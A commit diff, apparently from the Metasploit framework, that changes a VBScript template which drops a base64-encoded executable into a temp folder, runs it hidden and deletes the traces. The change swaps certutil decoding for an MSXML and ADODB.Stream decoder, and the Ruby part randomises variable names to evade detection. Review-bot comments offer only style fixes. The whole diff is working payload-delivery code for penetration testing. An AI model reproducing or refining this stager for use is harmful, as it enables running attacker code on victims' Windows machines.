Use MSXML decoder instead
parent
19bd7b98f4
commit
629bc00696
|
@ -1,27 +1,34 @@
|
|||
Function %{var_decodefunc}(%{var_decodebase64})
|
||||
%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
|
||||
"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
|
||||
%{var_decodebase64} & "</B64DECODE>"
|
||||
Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
|
||||
%{var_xmldoc}.LoadXML(%{var_xml})
|
||||
%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
|
||||
set %{var_xmldoc} = nothing
|
||||
End Function
|
||||
|
||||
Function %{var_func}()
|
||||
%{var_shellcode} = "%{base64_shellcode}"
|
||||
|
||||
Dim %{var_obj}
|
||||
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
|
||||
Dim %{var_stream}
|
||||
Dim %{var_tempdir}
|
||||
Dim %{var_tempbase64}
|
||||
Dim %{var_basedir}
|
||||
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
|
||||
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
|
||||
%{var_obj}.CreateFolder(%{var_basedir})
|
||||
%{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
|
||||
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
|
||||
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
|
||||
%{var_stream}.Write %{var_shellcode}
|
||||
%{var_stream}.Close
|
||||
Dim %{var_shell}
|
||||
Set %{var_shell} = CreateObject("Wscript.Shell")
|
||||
%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
|
||||
%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
|
||||
Set %{var_adodbstream} = CreateObject("ADODB.Stream")
|
||||
%{var_adodbstream}.Type = 1
|
||||
%{var_adodbstream}.Open
|
||||
%{var_adodbstream}.Write %{var_decoded}
|
||||
%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
|
||||
%{var_shell}.run %{var_tempexe}, 0, true
|
||||
%{var_obj}.DeleteFile(%{var_tempexe})
|
||||
%{var_obj}.DeleteFile(%{var_tempbase64})
|
||||
%{var_obj}.DeleteFolder(%{var_basedir})
|
||||
End Function
|
||||
|
||||
%{init}
|
||||
%{init}
|
||||
|
|
|
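Review bot: `%{var_xml}` and `%{var_xmldoc}` in the new decode function, and `%{var_decoded}`, `%{var_adodbstream}` and `%{var_tempexe}` in `%{var_func}`, are assigned without a `Dim`, while the rest of the same function declares `%{var_obj}`, `%{var_stream}`, `%{var_tempdir}`, `%{var_tempbase64}` and `%{var_basedir}` explicitly before use. Adding `Dim %{var_xml}, %{var_xmldoc}` as the first line of the decode function and `Dim %{var_decoded}, %{var_adodbstream}, %{var_tempexe}` next to the existing `Dim` block keeps the template self-consistent. The decode function also carries no comment; a single `' returns the bytes of the base64 argument via the bin.base64 typed value of an MSXML node` line under the `Function` header would tell a maintainer what `nodeTypedValue` yields here, which is otherwise only implied by the `dt:dt` attribute.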
@ -1247,16 +1247,18 @@ require 'msf/core/exe/segment_appender'
|
|||
hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_tempbase64] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
|
||||
hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
|
||||
|
||||
hash_sub[:var_decodefunc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_xml] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_xmldoc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_decoded] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_adodbstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||
hash_sub[:init] = ""
|
||||
|
||||
if persist
|
||||
|
|
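Review bot: The six new `hash_sub[...] = Rex::Text.rand_text_alpha(rand(8)+8)` lines repeat the exact expression already used ten times above them, so the substitution list now has sixteen copies of one idiom and any change to the name-generation rule has to be made in every line; a loop reads more clearly, e.g. `%i[var_decodefunc var_xml var_xmldoc var_decoded var_adodbstream var_decodebase64].each do |k|` / `  hash_sub[k] = Rex::Text.rand_text_alpha(rand(8)+8)` / `end`. The same treatment would suit the ten existing assignments, but that is outside the change this commit makes. The enclosing method begins before the hunk and continues past `if persist`, so the rest of the substitution map is not visible here.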